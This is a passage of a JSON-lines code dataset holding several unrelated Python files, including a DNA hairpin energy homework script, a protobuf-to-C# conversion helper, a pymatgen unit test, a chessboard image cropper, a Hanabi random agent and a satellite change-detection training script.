main()\n","sub_path":"funcparse.py","file_name":"funcparse.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"290218558","text":"# IBiS 410 - Problem Set 3 - Problem 5\n#\n# Jonathan Strutz\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Use only top strand of hairpin\ndna_seq = 'GGCCCGCCGCAATATTAATT'\n\n# Import table as dictionary\nbp_deltaG = {'AA': 1.68, 'AC': 2.42, 'AG': 2.19, 'AT': 1.42,\n 'CA': 2.42, 'CC': 3.00, 'CG': 3.68, 'CT': 2.19,\n 'GA': 2.12, 'GC': 3.75, 'GG': 3.00, 'GT': 2.42,\n 'TA': 0.97, 'TC': 2.12, 'TG': 2.42, 'TT': 1.68}\n\n# Calculate deltaG\ndeltaG = 0\ndeltaG_cum_list = []\nfor double_bp in [dna_seq[i] + dna_seq[i+1] for i in range(len(dna_seq) - 1)]:\n deltaG += bp_deltaG[double_bp]\n deltaG_cum_list.append(deltaG)\nprint('\\nGibbs Free Energy:', deltaG, 'kT')\n\n# Calculate Force in pN\n# Recall that 1 kBT/nm = 4.114 pN\n# Assume 1 nm / bp (why I divide by length of the sequence minus one)\nforce = deltaG / (len(dna_seq) - 1) * 4.114\nprint('Force:', round(force, 2), 'pN')\n\n# Calculate Free Energy with Force\nfree_energy_list = []\nfor index, deltaG in enumerate(deltaG_cum_list):\n free_energy_list.append(deltaG - force * (index + 1) / 4.114)\n\n# Plot free energy as a function of number of base pairs opened\nplt.plot(range(0, len(dna_seq)), [0] + free_energy_list)\nplt.title('Free Energy for Force as we Open the Hairpin', size=16)\nplt.xlabel('n (number of base pairs opened)')\nplt.xlim([0, 20])\nplt.xticks(range(0, 20))\nplt.ylabel('Free Energy (k_B*T)')\nplt.ylim([0, 10])\nplt.savefig('HW3_5b')\n\n# Part C - Find switching time (assume R = 19 bp = 5.7 nm)\n# Using formula tau = tau' * exp(deltaG / kT) where tau' = R^2 / D\n# Calculate switch time in seconds\nswitch_time = 6 * np.pi * 10**-3 * 5.7**3 / (4 * 10**-21 * 10**27) * np.exp(9)\nprint('Switching Time:', round(1000 * switch_time, 2), 'ms\\n')\n","sub_path":"HW3/HW3_5.py","file_name":"HW3_5.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97849546","text":"#!/usr/bin/python\n# encoding=utf-8\n\"\"\"\n配置文件\n\"\"\"\n\nimport os\nimport subprocess\nfrom util import Util\n\nclass ExeRsp(object):\n def __init__(self):\n self.returncode = 0\n self.stderr = ''\n\nclass OneDes(object):\n \"\"\"\n 一行proto的注释信息\n \"\"\"\n def __init__(self):\n # 举例:optional bool purchased = 2; //是否可出售\n self.type = '' # 类型\n self.name = '' # 名称\n self.idx = '0' # 在proto里的索引\n self.des = '' # 注释\n self.flag = 0 # 标记:0-普通;1-枚举(enum)头;2-类(message)头\n\nclass Config(object):\n def __init__(self):\n self.table_path = './../table/'\n self.proto_path = './../proto/'\n self.enable_add_des = True # 是否添加注释\n self.use_auto_svn = False # 是否使用AutoSVN,使用则会自动提交cs和data文件\n self.use_tortoise_svn = True # 是否使用TortoiseSVN工具,使用则会在执行命令前先更新一次\n self.tortoise_svn_update_path = './../' # 更新路径\n\n self.client_table_prefix = 'c_table_' # 客户端表格二进制文件前缀\n self.server_table_prefix = 's_table_' # 服务端表格二进制文件前缀\n self.common_prefix = 'common_' # 公共库文件前缀\n self.command_prefix = 'command_' # 命令文件前缀\n\n self.client_table_package = 'Table' # 客户端表格包名\n self.server_table_package = 'table' # 服务端表格包名\n \n self.table_cs_path = './../output/table_cs/' # 表格CS文件存储相对路径\n self.table_data_path = './../output/table_data/' # 表格二进制文件存储相对路径\n self.common_cs_path = './../output/common_cs/' # 公共proto的CS文件存储相对路径\n self.command_cs_path = './../output/command_cs/' # 协议proto的CS文件存储相对路径\n\n self.copy_to_unity = True # 是否拷贝Unity需要的文件到Unity工程\n self.unity_table_cs_path = './../../Assets/Scripts/Table/table_cs/' # Unity中表格CS文件存储相对路径\n self.unity_table_data_path = './../../Assets/Resources/table_data/' # Unity中表格二进制文件存储相对路径\n self.unity_common_cs_path = './../../Assets/Scripts/MSG/common_cs/' # Unity中公共PB的CS文件存储相对路径\n self.unity_command_cs_path = './../../Assets/Scripts/MSG/command_cs/' # Unity中协议PB的CS文件存储相对路径\n\n @classmethod\n def proto_to_cs(cls, proto_name, cs_path):\n \"\"\"\n 根据proto文件生成cs文件\\n\n proto_name proto文件名称,xxx.proto\\n\n cs_path 输出的cs文件路径,xxx/xxx/xxx.cs\n \"\"\"\n os.system('protogen.exe -i:' + proto_name + ' -o:' + cs_path + ' -p:detectMissing')\n\n @classmethod\n def generate_proto_py_file(cls, proto_name):\n \"\"\"\n 根据proto文件生成python文件\\n\n proto_name proto文件名称(不带后缀),xxx\n \"\"\"\n ret = Config.execute_shell_command(['protoc.exe', '-I.', '--python_out=.', '{}.proto'.format(proto_name)], 'T')\n return ret\n\n @classmethod\n def delete_xml(cls, cs_path):\n text = ''\n pattern = '[global::System.Xml.Serialization.XmlIgnore]'\n target = '//Here has been deleted XmlIgnore'\n with open(cs_path, 'r') as f:\n text = f.read()\n if text.count(pattern) > 0:\n with open(cs_path,'w') as f:\n text = text.replace(pattern, target)\n f.write(text)\n\n @classmethod\n def add_des_from_proto_to_cs(cls, proto_path, cs_path):\n \"\"\"\n 把proto文件的注释转移到cs文件\\n\n proto_path proto文件路径,xxx/xxx/xxx.proto\\n\n cs_path cs文件路径,xxx/xxx/xxx.cs\n \"\"\"\n proto_text = ''\n with open(proto_path, 'r') as f:\n proto_text = f.readlines()\n Config.split_proto(proto_text, cs_path)\n\n @classmethod\n def split_proto(cls, proto_text, cs_path):\n \"\"\"\n 把proto文件的内容进行分析,拆分enum和message块\\n\n proto_text proto文件内容\\n\n cs_path cs文件路径,xxx/xxx/xxx.cs\n \"\"\"\n if len(proto_text) <= 0:\n return\n tmp_text = [] # 寻找到的一个结构\n is_in_finding = False # 在查找中,已经找到了开始标志,在寻找结尾\n finding_type = 0 # 查找的类型:0-枚举(enum);1-结构(message)\n idx = 0 # 行数索引\n \n # 1.寻找开头标记enum和message\n for line in proto_text:\n idx = idx + 1\n if line.find('enum ') != -1:\n is_in_finding = True\n finding_type = 0\n tmp_text.append(line.strip())\n break\n elif line.find('message ') != -1: # 子模块可能含有前置空格\n is_in_finding = True\n finding_type = 1\n tmp_text.append(line.strip())\n break\n\n if is_in_finding == False:\n return\n \n # 把开头部分找过的去掉\n proto_text[0 : idx] = []\n idx = 0\n if len(proto_text) <= 0:\n return\n\n # 2.先确保找到了一个左括号\n cnt = 0 # 找到的左括号数量\n for line in proto_text:\n idx = idx + 1\n tmp_text.append(line)\n if line.find('{') != -1:\n cnt = 1\n break\n if cnt != 1:\n return\n proto_text[0 : idx] = []\n idx = 0\n if len(proto_text) <= 0:\n return\n\n # 3.找到刚好抵消的右括号\n in_sub_class = False # 找到了子模块,message可能嵌套,这里只处理下一级的嵌套,下二级的给下一级处理\n sub_class_left_brackets_cnt = -1 # 子模块左括号数量\n sub_class_idx = 0 # 子模块出现时候的idx\n for line in proto_text:\n idx = idx + 1\n \n if in_sub_class is True:\n if sub_class_left_brackets_cnt == -1:\n if line.find('{') != -1:\n sub_class_left_brackets_cnt = 1\n else:\n if line.find('{') != -1:\n sub_class_left_brackets_cnt = sub_class_left_brackets_cnt + 1\n elif line.find('}') != -1:\n sub_class_left_brackets_cnt = sub_class_left_brackets_cnt - 1\n if sub_class_left_brackets_cnt == 0:\n in_sub_class = False\n sub_class_text = []\n for k in range(idx - sub_class_idx):\n sub_class_text.append(proto_text[sub_class_idx + k])\n Config.split_proto(sub_class_text, cs_path)\n continue\n \n # 只有非子模块时才看message,保证只看一级的\n if line.find('message ') != -1:\n in_sub_class = True\n sub_class_idx = idx - 1 # 注意这个idx是多前进了一步的(先加的),所以减去1\n continue\n\n tmp_text.append(line)\n if line.find('{') != -1:\n cnt = cnt + 1\n if cnt == 0:\n break\n elif line.find('}') != -1:\n cnt = cnt - 1\n if cnt == 0:\n break\n\n if cnt != 0:\n return\n proto_text[0 : idx] = []\n idx = 0\n\n # 4.处理这个块\n Config.do_one_split_proto(tmp_text, cs_path, finding_type)\n\n # 5.寻找下一个块\n if len(proto_text) <= 0:\n return\n Config.split_proto(proto_text, cs_path)\n\n @classmethod\n def do_one_split_proto(cls, proto_text, cs_path, p_type):\n \"\"\"\n 分析一个完整的块,一个enum或者message\\n\n proto_text 这个完整块的的proto内容\\n\n cs_path 对应的cs文件路径\\n\n p_type 类型:0-枚举(enum);1-结构(message)\n \"\"\"\n\n des_list = [] # 这个块所有的注释内容\n line_idx = 0\n for line in proto_text:\n line_idx = line_idx + 1\n if line.find('//') != -1:\n first = Util.strip_notes_spaces_tab(line.split('//', 1)[0])\n # 这是一个纯粹的注释,不是写在字段后面的,忽略掉\n if Util.empty_str(first):\n continue\n\n oneDes = OneDes()\n # 注释和内容分离\n oneDes.des = line.split('//', 1)[1].strip()\n\n if line_idx == 1: # 第一行,类头\n oneDes.type = first.strip().split(' ', 1)[1]\n if p_type == 0:\n oneDes.flag = 1\n else:\n oneDes.flag = 2\n des_list.append(oneDes)\n continue\n\n if p_type == 0:\n oneDes.type = first.split('=', 1)[0].strip()\n else:\n first_1 = first.split('=', 1)[0].strip()\n s_list = first_1.split(' ')\n oneDes.type = s_list[1].strip()\n oneDes.name = s_list[2].strip()\n\n first_2 = first.split('=', 1)[1].strip()\n if first_2.find('[') != -1: # 枚举类型的字段有默认值\n first_2 = first_2.split('[', 1)[0].strip()\n oneDes.idx = first_2.strip(';')\n des_list.append(oneDes)\n\n if len(des_list) <= 0:\n return\n \n name_str = Util.strip_notes_spaces_tab(proto_text[0])\n\n if p_type == 0:\n name_str = 'public {}'.format(name_str)\n else:\n name_str_t = name_str.split(' ', 1)[1].strip()\n name_str = 'public partial class {} : global::ProtoBuf.IExtensible'.format(name_str_t)\n\n ############### 开始处理cs文件 ###############\n\n cs_text = '' # cs文件的内容\n with open(cs_path, 'r') as f:\n cs_text = f.readlines()\n \n idx_s = -1 # 这个类在cs文件里的第一行索引\n cnt = -1 # 当前找到的左括号数量\n\n # 寻找结构的头标志\n for line in cs_text:\n idx_s = idx_s + 1\n if line.find(name_str) != -1:\n if line.find('{') != -1:\n cnt = 1\n else:\n cnt = 0\n break\n if cnt == -1:\n return\n\n idx_s = idx_s - 1 # 退一行,描述头在类的前一行\n idx_t = -1 # 这个类在cs文件里最后一行的索引\n first = True # 还需要找第一个左括号\n if cnt == 1:\n first = False\n \n for line in cs_text:\n idx_t = idx_t + 1\n if idx_t < idx_s:\n continue\n \n if line.find('{') != -1:\n cnt = cnt + 1\n first = False\n if first == False and line.find('}') != -1: # 生成的文件,可能左右括号在一行\n cnt = cnt - 1\n\n # 每一行尝试查找注释\n cs_text[idx_t] = Config.try_add_des(des_list, p_type, line)\n \n if cnt == 0 and first == False:\n break\n with open(cs_path, 'w') as f:\n f.writelines(cs_text)\n \n @classmethod\n def try_add_des(cls, des_list, p_type, val):\n \"\"\"\n 尝试增加注释\n \"\"\"\n if len(val.strip()) <= 0:\n return val\n \n if p_type == 0:\n for oneDes in des_list:\n if oneDes.flag == 0:\n if val.find('[global::ProtoBuf.ProtoEnum(Name=@\"{}\", Value='.format(oneDes.type)) != -1:\n des_str = ' /// \\n /// {}\\n /// \\n'.format(oneDes.des)\n return des_str + val\n else:\n if val.find('[global::ProtoBuf.ProtoContract(Name=@\"{}\")]'.format(oneDes.type)) != -1:\n des_str = ' /// \\n /// {}\\n /// \\n'.format(oneDes.des)\n return des_str + val\n else:\n for oneDes in des_list:\n if oneDes.flag == 0:\n n_key = ' /// \\n /// {}\\n /// \\n'.format(oneDes.des)\n f_key = '[global::ProtoBuf.ProtoMember({}, '.format(oneDes.idx)\n if val.find(f_key) != -1:\n return n_key + val\n else:\n if val.find('[global::System.Serializable, global::ProtoBuf.ProtoContract(Name=@\"{0}\")]'.format(oneDes.type)) != -1:\n des_str = ' /// \\n /// {}\\n /// \\n'.format(oneDes.des)\n return des_str + val\n\n return val\n\n @classmethod\n def execute_shell_command(cls, args, wait = 'T'):\n ret = ExeRsp()\n p = subprocess.Popen(args, stderr=subprocess.PIPE)\n if wait == 'T':\n ret.returncode = p.wait()\n ret.stderr = p.stderr.read()\n return ret\n else:\n ret.returncode = 0\n return ret","sub_path":"table/tools/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"641862356","text":"from datetime import datetime\nfrom enum import Enum\n\n\nclass TicketRequest(object):\n def __init__(self, req_id, transporter, departure, arrival, date, from_time, to_time):\n self.id = req_id\n self.transporter = transporter\n self.departure = departure\n self.arrival = arrival\n self.date = date\n self.from_time = from_time\n self.to_time = to_time\n\n\nclass TicketResponse(object):\n def __init__(self, datetime, seats):\n self.datetime = datetime\n self.seats = seats\n\n def __repr__(self):\n return f'Datetime: {str(self.datetime)}, Free seats - {self.seats}'\n\n\nclass User(object):\n def __init__(self,\n user_id,\n username,\n first_name,\n last_name,\n is_bot,\n language_code,\n visit_datetime):\n self.id = user_id\n self.username = username\n self.first_name = first_name\n self.last_name = last_name\n self.is_bot = is_bot\n self.language_code = language_code\n self.visit_datetime = visit_datetime\n\n @classmethod\n def from_dict(cls, data):\n return cls(\n user_id=data['id'],\n username='@' + data['username'],\n first_name=data['first_name'],\n last_name=data['last_name'],\n is_bot=data['is_bot'],\n language_code=data['language_code'],\n visit_datetime=datetime.now()\n )\n\n def asdict(self):\n return {\n 'user_id': self.id,\n 'username': self.username,\n 'first_name': self.first_name,\n 'last_name': self.last_name,\n 'is_bot': self.is_bot,\n 'language_code': self.language_code,\n 'visit_datetime': str(self.visit_datetime)\n }\n\n\nclass RequestStatus(Enum):\n created = 'CREATED'\n in_progress = 'IN PROGRESS'\n closed = 'CLOSED'\n\n\nclass Request(object):\n def __init__(self,\n request_id,\n user_id,\n transporter,\n departure,\n arrival,\n required_date,\n from_time,\n to_time,\n status,\n created_at,\n closed_at):\n self.id = request_id\n self.user_id = user_id\n self.transporter = transporter\n self.departure = departure\n self.arrival = arrival\n self.required_date = required_date\n self.from_time = from_time\n self.to_time = to_time\n self.status = status\n self.created_at = created_at\n self.closed_at = closed_at\n\n @classmethod\n def from_dict(cls, data):\n from utils import str_to_datetime\n required_date = datetime.combine(data['required_date'], datetime.min.time())\n return cls(\n request_id=data['request_id'],\n user_id=data['user_id'],\n transporter=data['transporter'],\n departure=data['departure'],\n arrival=data['arrival'],\n required_date=required_date,\n from_time=str_to_datetime(required_date, data['from_time']),\n to_time=str_to_datetime(required_date, data['to_time']),\n status=data['status'],\n created_at=data['created_at'],\n closed_at=data['closed_at']\n )\n\n def asdict(self):\n return {\n 'request_id': self.id,\n 'user_id': self.user_id,\n 'transporter': self.transporter,\n 'departure': self.departure,\n 'arrival': self.arrival,\n 'required_date': str(self.required_date),\n 'from_time': self.from_time.strftime(\"%H:%M\"),\n 'to_time': self.to_time.strftime(\"%H:%M\"),\n 'status': self.status.value,\n 'created_at': str(self.created_at),\n 'closed_at': str(self.closed_at),\n }\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"352567626","text":"from __future__ import annotations\n\nimport os\n\nfrom pymatgen.analysis.chemenv.connectivity.environment_nodes import EnvironmentNode\nfrom pymatgen.util.testing import PymatgenTest\n\ntry:\n import bson\nexcept ModuleNotFoundError:\n bson = None # type: ignore\n\n__author__ = \"waroquiers\"\n\njson_files_dir = os.path.join(\n PymatgenTest.TEST_FILES_DIR,\n \"chemenv\",\n \"json_test_files\",\n)\n\n\nclass EnvironmentNodesTest(PymatgenTest):\n def test_equal(self):\n s = self.get_structure(\"SiO2\")\n en = EnvironmentNode(central_site=s[0], i_central_site=0, ce_symbol=\"T:4\")\n\n en1 = EnvironmentNode(central_site=s[2], i_central_site=0, ce_symbol=\"T:4\")\n assert en == en1\n assert not en.everything_equal(en1)\n\n en2 = EnvironmentNode(central_site=s[0], i_central_site=3, ce_symbol=\"T:4\")\n assert en != en2\n assert not en.everything_equal(en2)\n\n en3 = EnvironmentNode(central_site=s[0], i_central_site=0, ce_symbol=\"O:6\")\n assert en == en3\n assert not en.everything_equal(en3)\n\n en4 = EnvironmentNode(central_site=s[0], i_central_site=0, ce_symbol=\"T:4\")\n assert en == en4\n assert en.everything_equal(en4)\n\n def test_as_dict(self):\n s = self.get_structure(\"SiO2\")\n en = EnvironmentNode(central_site=s[2], i_central_site=2, ce_symbol=\"T:4\")\n\n en_from_dict = EnvironmentNode.from_dict(en.as_dict())\n assert en.everything_equal(en_from_dict)\n\n if bson is not None:\n bson_data = bson.BSON.encode(en.as_dict())\n en_from_bson = EnvironmentNode.from_dict(bson_data.decode())\n assert en.everything_equal(en_from_bson)\n\n def test_str(self):\n s = self.get_structure(\"SiO2\")\n en = EnvironmentNode(central_site=s[2], i_central_site=2, ce_symbol=\"T:4\")\n assert str(en) == \"Node #2 Si (T:4)\"\n\n\nif __name__ == \"__main__\":\n import unittest\n\n unittest.main()\n","sub_path":"pymatgen/analysis/chemenv/connectivity/tests/test_environment_nodes.py","file_name":"test_environment_nodes.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"294348920","text":"# LIBRERIAS\nimport numpy as np\nimport cv2\nfrom time import sleep\nimport picamera\nimport funciones as fun\n#inicializacion de variables\n# acomodacion de camara\n#camera.start_preview()\n#sleep(1)\n#camera.stop_preview()\n#<<<<<<<<<<<<<<<<<< inicio calibracion >>>>>>>>>>>>>>>>>\ninp='';\nwhile(inp.upper()!='Y'):\n i=1\n name='cal1.jpg'\n# camera.capture(name,0)\n Im= cv2.imread(name)\n# cv2.imshow('imagen',Im)\n gray=cv2.cvtColor(Im,cv2.COLOR_BGR2GRAY);\n warp=fun.encuadre(gray,Im)\n (war,(xf,yf))=fun.calibracion(Im)\n #cv2.imshow('CAL',war)\n cv2.waitKey(0);\n print(xf)\n print(yf)\n\n #inp=input('la cuadricula esta bien ubicada? y/n ')\n inp='y'\n cv2.destroyAllWindows()\n#<<<<<<<<<<<<<<<<<< fin calibracion >>>>>>>>>>>>>>>>> \n\nprint('/----------------------/')\nprint(xf)\nprint(yf)\nprint('/----------------------/')\n\n#<<<<<<<<<<<<<<<<<< reconocimiento >>>>>>>>>>>>>>>>>\n# nececesito umbral adaptativo\nreina=cv2.imread('imagenes/reina.png',0)\n(w,h)=reina.shape\ninp='';\ni=2\nMIN_MATCH_COUNT=10\n#surf=cv2.xfeatures2d.SURF_create(400)\n#kp1, des1=surf.detectAndCompute(reina,None)\n#print (len(kp1))\n\n#img2=cv2.drawKeypoints(reina,kp1,None,(0,200,0),4)\n#cv2.imshow('fg',img2)\nname='rec1.jpg'\n ## camera.capture(name,0)\nIm= cv2.imread(name)\ncv2.imshow('imagen',Im)\ngray=cv2.cvtColor(Im,cv2.COLOR_BGR2GRAY)\nwarp=fun.encuadre(gray,Im)\ngrw=cv2.cvtColor(warp,cv2.COLOR_BGR2GRAY)\n#thresh de otsu\nret,th=cv2.threshold(grw,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\ncv2.imshow('h',th)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\nfor i in range(0,8):\n for j in range(0,8):\n name='tile'+str(i)+'-'+str(j)+'.jpg'\n Cp=th[xf[i]+17:xf[i+1]+17,yf[j]-18:yf[j+1]-18]\n Im= cv2.imwrite(name,Cp)\n print(name)\n \n\n","sub_path":"tesis/test/cutim.py","file_name":"cutim.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635107965","text":"#-*- coding:utf-8 -*-\n\nimport os\n\nimport sys\nimport tornado\nfrom tornado import concurrent\nfrom libs.apsCron import get_scheduler\nfrom libs.confUtil import config\nport=int(config('system','port'))\n\ndef autoLoad():\n try:\n pt=os.path.join(os.path.dirname(__file__), \"apps\")\n apps=os.listdir(pt)\n apps.pop()\n urls=[]\n for _app in apps:\n __import__('apps.%s.handler'%_app)\n module=sys.modules['apps.%s.handler'%_app]\n for _handler in (getattr(module,'handler')):\n urls.append(_handler)\n return urls\n except Exception as e:\n raise ValueError('路由加载失败')\n\ndef run_main():\n urls=autoLoad()\n app = tornado.web.Application(handlers=urls)\n app.listen(port)\n tornado.ioloop.IOLoop.current().start()\n\ndef cronJob():\n '示例'\n schedule = get_scheduler()\n #schedule.add_job(cron_query, 'interval', seconds=60)\n #schedule.start()\n\n\n\nif __name__ == \"__main__\":\n workers=3\n with concurrent.futures.ProcessPoolExecutor(max_workers=workers) as executor:\n\n run_main()\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239692099","text":"from __future__ import print_function\r\n\r\nimport sys\r\nimport getopt\r\nimport rl_env\r\nimport random\r\n\r\nclass Runner(object):\r\n\t\"\"\"Runner class.\"\"\"\r\n\tdef __init__(self, numAgents, numEpisodes):\r\n\t\tself.eps = numEpisodes\r\n\t\tself.players = numAgents\r\n\t\tself.env = rl_env.make(num_players=numAgents)\r\n\t\t\r\n\r\n\tdef run(self):\r\n\t\trewards = []\r\n\t\tfor eps in range(self.eps):\r\n\t\t\tprint('Running episode: %d' % eps)\r\n\r\n\t\t\tobs = self.env.reset() # Observation of all players\r\n\r\n\t\t\tdone = False\r\n\t\t\teps_reward = 0\r\n\r\n\t\t\twhile not done:\r\n\t\t\t\tfor player in range(self.players):\r\n\t\t\t\t\tob = obs['player_observations'][player]\r\n\t\t\t\t\taction = random.choice(ob['legal_moves'])\r\n\t\t\t\t\tprint('Agent: {} action: {}'.format(obs['current_player'], action))\r\n\t\t\t\t\tobs, reward, done, _ = self.env.step(action)\r\n\t\t\t\t\teps_reward += reward\r\n\t\t\trewards.append(eps_reward)\r\n\t\t\t\r\n\t\tprint('Max Reward: %.3f' % max(rewards))\r\n\r\nif __name__ == \"__main__\":\r\n\trunner = Runner(2,1)\r\n\trunner.run()","sub_path":"custom_randomAgent.py","file_name":"custom_randomAgent.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"242474402","text":"\n# PyTorch\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.autograd import Variable\nimport torchvision.transforms as tr\n\n# Models\nfrom models.fresunet import FresUNet\n\n# Other\nimport os\nimport numpy as np\nimport random\nfrom skimage import io\nfrom scipy.ndimage import zoom\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm as tqdm\n\nimport time\nimport warnings\nfrom pprint import pprint\n\nfrom data import ChangeDetectionDataset, RandomFlip, RandomRot\n\n\n\ndef test(loader, criterion, net):\n\n net.eval()\n tot_loss = 0\n tot_count = 0\n\n class_correct = list(0. for i in range(2))\n class_total = list(0. for i in range(2))\n class_accuracy = list(0. for i in range(2))\n tp = 0\n tn = 0\n fp = 0\n fn = 0\n\n for batch in loader:\n I1 = batch['I1'].float().cuda()\n I2 = batch['I2'].float().cuda()\n label = torch.squeeze(batch['label'].cuda())\n\n output = net(I1, I2)\n\n loss = criterion(output, label.long())\n tot_loss += loss.data * np.prod(label.size())\n _, predicted = torch.max(output.data, 1)\n c = (predicted.int() == label.data.int())\n tot_count += np.prod(label.size())\n\n for i in range(c.size(1)):\n for j in range(c.size(2)):\n l = int(label.data[0, i, j])\n class_correct[l] += c[0, i, j]\n class_total[l] += 1\n\n pr = (predicted.int() > 0).cpu().numpy()\n gt = (label.data.int() > 0).cpu().numpy()\n\n tp += np.logical_and(pr, gt).sum()\n tn += np.logical_and(np.logical_not(pr), np.logical_not(gt)).sum()\n fp += np.logical_and(pr, np.logical_not(gt)).sum()\n fn += np.logical_and(np.logical_not(pr), gt).sum()\n\n net_loss = tot_loss / tot_count\n net_accuracy = 100 * (tp + tn) / tot_count\n for i in range(2):\n class_accuracy[i] = 100 * class_correct[i] / max(class_total[i], 0.00001)\n prec = tp / (tp + fp)\n rec = tp / (tp + fn)\n f_meas = 2 * prec * rec / (prec + rec)\n prec_nc = tn / (tn + fn)\n rec_nc = tn / (tn + fp)\n\n pr_rec = [prec, rec, f_meas, prec_nc, rec_nc]\n\n return net_loss, net_accuracy, class_accuracy, pr_rec\n\n\ndef train(n_epochs, net, criterion, save=True):\n t = np.linspace(1, n_epochs, n_epochs)\n\n epoch_train_loss = 0 * t\n epoch_train_accuracy = 0 * t\n epoch_train_change_accuracy = 0 * t\n epoch_train_nochange_accuracy = 0 * t\n epoch_train_precision = 0 * t\n epoch_train_recall = 0 * t\n epoch_train_Fmeasure = 0 * t\n epoch_test_loss = 0 * t\n epoch_test_accuracy = 0 * t\n epoch_test_change_accuracy = 0 * t\n epoch_test_nochange_accuracy = 0 * t\n epoch_test_precision = 0 * t\n epoch_test_recall = 0 * t\n epoch_test_Fmeasure = 0 * t\n\n best_fm = 0\n\n best_lss = 1000\n\n optimizer = torch.optim.Adam(net.parameters(), weight_decay=1e-4)\n\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, 0.95)\n\n for epoch_index in tqdm(range(n_epochs)):\n net.train()\n print('Epoch: ' + str(epoch_index + 1) + ' of ' + str(N_EPOCHS))\n\n # Train loop\n for batch in train_loader:\n I1 = batch['I1'].float().cuda()\n I2 = batch['I2'].float().cuda()\n label = torch.squeeze(batch['label'].cuda())\n\n optimizer.zero_grad()\n output = net(I1, I2)\n loss = criterion(output, label.long())\n loss.backward()\n optimizer.step()\n\n scheduler.step()\n\n # Eval\n epoch_train_loss[epoch_index], epoch_train_accuracy[epoch_index], cl_acc, pr_rec = test(train_loader, criterion, net)\n epoch_train_nochange_accuracy[epoch_index] = cl_acc[0]\n epoch_train_change_accuracy[epoch_index] = cl_acc[1]\n epoch_train_precision[epoch_index] = pr_rec[0]\n epoch_train_recall[epoch_index] = pr_rec[1]\n epoch_train_Fmeasure[epoch_index] = pr_rec[2]\n\n epoch_test_loss[epoch_index], epoch_test_accuracy[epoch_index], cl_acc, pr_rec = test(test_loader, criterion, net)\n epoch_test_nochange_accuracy[epoch_index] = cl_acc[0]\n epoch_test_change_accuracy[epoch_index] = cl_acc[1]\n epoch_test_precision[epoch_index] = pr_rec[0]\n epoch_test_recall[epoch_index] = pr_rec[1]\n epoch_test_Fmeasure[epoch_index] = pr_rec[2]\n\n fm = epoch_train_Fmeasure[epoch_index]\n if fm > best_fm:\n best_fm = fm\n save_str = 'net-best.pth.tar'\n torch.save(net.state_dict(), save_str)\n\n lss = epoch_train_loss[epoch_index]\n if lss < best_lss:\n best_lss = lss\n save_str = 'net-best.pth.tar'\n torch.save(net.state_dict(), save_str)\n\n print(\"train loss:\", epoch_train_loss[epoch_index],\n \"train nochange acc:\", epoch_train_nochange_accuracy[epoch_index],\n \"train change acc:\", epoch_train_change_accuracy[epoch_index])\n\n print(\"test loss:\", epoch_test_loss[epoch_index],\n \"test nochange acc:\", epoch_test_nochange_accuracy[epoch_index],\n \"test change acc:\", epoch_test_change_accuracy[epoch_index])\n\n\n out = {'train_loss': epoch_train_loss[-1],\n 'train_accuracy': epoch_train_accuracy[-1],\n 'train_nochange_accuracy': epoch_train_nochange_accuracy[-1],\n 'train_change_accuracy': epoch_train_change_accuracy[-1],\n 'test_loss': epoch_test_loss[-1],\n 'test_accuracy': epoch_test_accuracy[-1],\n 'test_nochange_accuracy': epoch_test_nochange_accuracy[-1],\n 'test_change_accuracy': epoch_test_change_accuracy[-1]}\n\n print('pr_c, rec_c, f_meas, pr_nc, rec_nc')\n print(pr_rec)\n\n return out\n\n\ndef save_test_results(dset):\n for name in tqdm(dset.names):\n with warnings.catch_warnings():\n I1, I2, cm = dset.get_img(name)\n I1 = torch.unsqueeze(I1, 0).float().cuda()\n I2 = torch.unsqueeze(I2, 0).float().cuda()\n out = net(I1, I2)\n _, predicted = torch.max(out.data, 1)\n I = np.stack((255*cm,255*np.squeeze(predicted.cpu().numpy()),255*cm),2)\n io.imsave(f'{net_name}-{name}.png',I)\n\n\n# -\n# Hyperparams\nBATCH_SIZE = 32\nPATCH_SIDE = 96\nN_EPOCHS = 50\nPATH_TO_DATASET = '/raid/users/ebarnett/OneraImages/'\nTRAIN_STRIDE = int(PATCH_SIDE/2) - 1\nTYPE = 3 # 0-RGB | 1-RGBIr | 2-All bands s.t. resulution <= 20m | 3-All bands\nLOAD_TRAINED = False\n\n# -\n# Datasets\ntrain_dataset = ChangeDetectionDataset(PATH_TO_DATASET, train=True, stride=TRAIN_STRIDE, transform=tr.Compose([RandomFlip(), RandomRot()]))\ntrain_loader = DataLoader(train_dataset, batch_size = BATCH_SIZE, shuffle = True, num_workers = 4)\n\nweights = torch.FloatTensor(train_dataset.weights).cuda()\n\ntest_dataset = ChangeDetectionDataset(PATH_TO_DATASET, train = False, stride = TRAIN_STRIDE)\ntest_loader = DataLoader(test_dataset, batch_size = BATCH_SIZE, shuffle = True, num_workers = 4)\n\n\n# -\n# Model\nnet, net_name = FresUNet(2*13, 2), 'FresUNet'\nnet.cuda()\n\n# -\n# Loss\ncriterion = nn.NLLLoss(weight=weights) # to be used with logsoftmax output\n\n\n# -\n# Training\n# 